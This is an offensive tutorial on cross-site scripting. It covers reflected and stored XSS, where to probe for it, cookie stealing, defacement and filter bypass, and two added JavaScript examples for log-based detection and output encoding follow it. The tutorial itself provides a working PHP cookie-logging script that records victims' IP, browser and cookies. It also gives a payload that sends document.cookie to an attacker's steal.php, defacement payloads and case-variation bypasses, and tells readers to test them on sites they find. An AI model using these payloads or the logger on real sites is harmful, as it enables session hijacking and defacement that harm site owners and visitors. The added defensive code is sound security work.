
1. Introduction to Cross Site Scripting (XSS)
2. Why XSS?
3. Types of Cross Site Scripting
   => Persistent Cross Site Scripting
   => Non-Persistent Cross Site Scripting
4. Where to Find XSS Vulnerabilities?
5. Cookie Stealing with XSS
6. Defacing with XSS
7. Bypassing XSS Filters

# It is Cross Site Scripting; don't confuse it with Cascading Style Sheets (CSS).
# It is a very common attack found in web applications and allows the attacker to insert malicious code.
# It is a client-side attack which lets the attacker cause damage to your website.
# It allows attackers to bypass client-side security mechanisms.

# The concept of XSS is to manipulate the client-side scripts of a web application so that they execute in the manner desired by the malicious user.
# XSS is the process of injecting JavaScript (mainly) and also HTML (HTML injection) into a website to get the output the attacker wants.
# The most common output an attacker wants is cookies.

Cookies:
A cookie is one or more pieces of information stored as text strings on your machine. A web server sends you a cookie and the browser stores it; the browser then returns the cookie to the server the next time the page is requested. Cookies are also what keep you logged in: without cookies a site cannot remember that you are logged in. PHPSESSID is the basic cookie that identifies your session on a PHP site.

Non-Persistent: the most common type of XSS.

Persistent: the dangerous and permanent type of XSS.

Non-Persistent: the injected code is not permanent; it lasts only for a short time, while the user is on the page or holds the URL containing the malicious code. The simplest place to find non-persistent XSS is a basic search box or search engine. HTML and JavaScript code are executed.

# Example site with a search engine.

POST method:
http://www.sitename.com/search.php (insert the code in the search box)
Code: <script>alert(/hacked/)</script>

GET method:
http://www.sitename.com/search.php?search=<script>alert(/hacked/)</script>

Persistent: the injected code is permanent; it stays on the site and its output can be seen by any user of the site. This kind of attack can be carried out on blogs, shoutboxes, profiles, forums, comment boxes, testimonial pages, and most other places where you insert data and it stays there.

Persistent: the attacker can easily insert malicious code into the site to pop up a message, deface it, grab cookies, etc.
Example code for a pop-up message: <script>alert(/Hacked/)</script>
-> When the attacker inserts this code in some input box, the output /Hacked/ pops up whenever someone visits the page.

# The best way to check for XSS is manually: find sites and insert a short piece of code to see whether it comes back in the output unchanged.
1. <script>alert(hack)</script>
2. <h1>hacked</h1>
# Places to check: search boxes, blogs, shoutboxes, comment boxes, login boxes, feedback forms.

In the cookie stealing process we can get the following details of the victim:
# IP Address
# Browser
# Date and Time
# Referrer Link

Example of a PHP script which accepts cookies.

<?php
header("Location: http://www.google.com");
$cookie = $_GET['cookie'];
$file = fopen("logs.txt", "a");
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
$httprefi = $_SERVER['HTTP_REFERER'];
$httpagent = $_SERVER['HTTP_USER_AGENT'];
fwrite($file, "\r\nUser Details :- \r\n-> IP Address: $ip\r\n-> Date: $datum (Date=+5.30 GTM)\r\n-> Browser: $httpagent\r\n-> Refferal: $httprefi\r\n Cookies: $cookie \r\n--==[Thnx For Using It :) ]==--\n");
fclose($file);
exit;
?>

Working:
# Let's assume that we found a site vulnerable to persistent XSS and the site also has a login facility.
# We input the code in the box where we found the vulnerability.
Code: <script> document.location = 'http://yoursite.com/steal.php?cookie' + document.cookie; </script>

Working: now whenever someone views the page where we added the cookie-grabbing code, that user's cookie is written to logs.txt (or whatever you named the file) and the user is redirected to the site given in the PHP file, in this case www.google.com.
Note: if the code doesn't work it means we have to bypass the filter.
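From the defender's side, the requests that deliver the probe and cookie-grabbing payloads above show up in the web server's access log. The following is an added example, not part of the original tutorial, that scans constructed Apache-style log lines for them after percent-decoding and lower-casing, so the encoded and case-varied forms are still caught; the log lines, IP addresses and the hostname evil.example are made up.

```javascript
// Added example, not from the tutorial: flag access-log requests carrying the
// XSS probe / cookie-grabbing payloads discussed above. The log lines are
// constructed (RFC 5737 test addresses, made-up hostname).
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?search=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?search=shoes HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /search.php?search=%3CsCrIpT%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2Fsteal.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2FsCrIpT%3E HTTP/1.1" 200 700 "-" "curl/8.0"',
];

// Combined log format: client, [timestamp], "METHOD URL PROTO", status.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

// Signatures run against the decoded, lower-cased URL, so <sCrIpT>,
// %3Cscript%3E and double-encoded variants all reduce to the same form.
const SIGNATURES = [
  { name: 'script-tag', re: /<\s*script/ },
  { name: 'cookie-access', re: /document\.cookie/ },
  { name: 'redirect', re: /document\.location|window\.open/ },
  { name: 'html-injection', re: /<\s*(iframe|embed|img|marquee)/ },
];

// '+' is a space in form encoding; then unwind up to three layers of
// percent-encoding, stopping on a malformed escape.
function normalize(url) {
  let out = url.replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {
    let dec;
    try { dec = decodeURIComponent(out); } catch (e) { break; }
    if (dec === out) break;
    out = dec;
  }
  return out.toLowerCase();
}

// One hit per suspicious request, listing the signatures that matched.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue; // not a combined-format line
    const [, ip, ts, method, url, status] = m;
    const norm = normalize(url);
    const matched = SIGNATURES.filter(s => s.re.test(norm)).map(s => s.name);
    if (matched.length) hits.push({ ip, ts, method, path: url.split('?')[0], status, matched });
  }
  return hits;
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 1));
```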

# To deface a site using XSS you just need a persistent vulnerability.
# This is done by inserting HTML injection code into the site.
# You can even add images, Flash videos and pre-made HTML pages with an iframe.

Example codes:
# Defacing by image: <IMG SRC="http://site.com/hacked.png">
# Defacing by HTML page: <iframe src=http://site/page.html></iframe>
# Defacing by inserting a Flash file: <EMBED SRC=http://site/hacked.swf>
# Redirecting to your site: <script>window.open( "http://www.site.com/" )</script>

# XSS filters help stop XSS attacks on a website.
# These filters help the admin by refusing to execute certain words and characters which are used in XSS attacks.
# To bypass these filters you can change the characters of the script.

Example codes:
Original: <script>alert(/hacked/')</script>
Changed code: <sCrIpT>aLeRt(/hacked/')</ScRiPt>
Original: <marquee><h1>XSS</h1></marquee>
Changed code: '">><marquee><h1>XSS</h1></marquee>
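As an added example, not part of the original tutorial, the following JavaScript shows why the bypasses above work: a keyword blocklist of the kind being evaded is compared with contextual output encoding, each applied to the tutorial's own payloads before they are echoed into the text and attribute positions of a search page. The two filters, the page template and the structural check are constructed for illustration.

```javascript
// Added example, not from the tutorial: blocklist filtering vs. output encoding,
// tested against the tutorial's own payloads. Filters and template are constructed.
// The kind of filter the tutorial bypasses: strips a few literal tokens.
function naiveBlocklist(input) {
  return input.replace(/<script>|<\/script>|alert\(/g, '');
}

// "Fixed" blocklist: case-insensitive, which defeats <sCrIpT> but nothing else.
function caseInsensitiveBlocklist(input) {
  return input.replace(/<\/?script>|alert\(/gi, '');
}
// Contextual encoding for HTML text and double-quoted attribute values: the
// five characters that can change HTML structure become entities.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(input) {
  return input.replace(/[&<>"']/g, c => ENTITIES[c]);
}

// Echo the search term the way search.php would: into body text and into an
// attribute. The response is intact when it still matches its own template,
// i.e. the untrusted part added no tag and did not close the attribute.
function renderSearch(query, sanitize) {
  const q = sanitize(query);
  const text = `<p>Results for ${q}</p>`;
  const attr = `<input name="search" value="${q}">`;
  return {
    sanitized: q,
    textIntact: /^<p>Results for [^<>]*<\/p>$/.test(text),
    attrIntact: /^<input name="search" value="[^"]*">$/.test(attr),
  };
}
// The tutorial's payloads: the basic probe and the two "changed code" bypasses.
const PAYLOADS = {
  basic: '<script>alert(/hacked/)</script>',
  caseVariant: "<sCrIpT>aLeRt(/hacked/')</ScRiPt>",
  breakout: '\'">><marquee><h1>XSS</h1></marquee>',
};

// For each payload, report which sanitizer keeps the page intact.
function compare() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    out[name] = {
      naive: renderSearch(p, naiveBlocklist),
      caseInsensitive: renderSearch(p, caseInsensitiveBlocklist),
      encoded: renderSearch(p, encodeForHtml),
    };
  }
  return out;
}
```

Note that the blocklists only ever catch the payloads their author thought of, while encoding keeps the page intact for all three inputs because it changes the characters that carry structure, not the words the attacker chose.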

Devinder Goyal
Cyber Security and Anti Hacking Organisation (Member Secretary)

E-mail: devindergoyal@gmail.com Phone: +91-9872559666
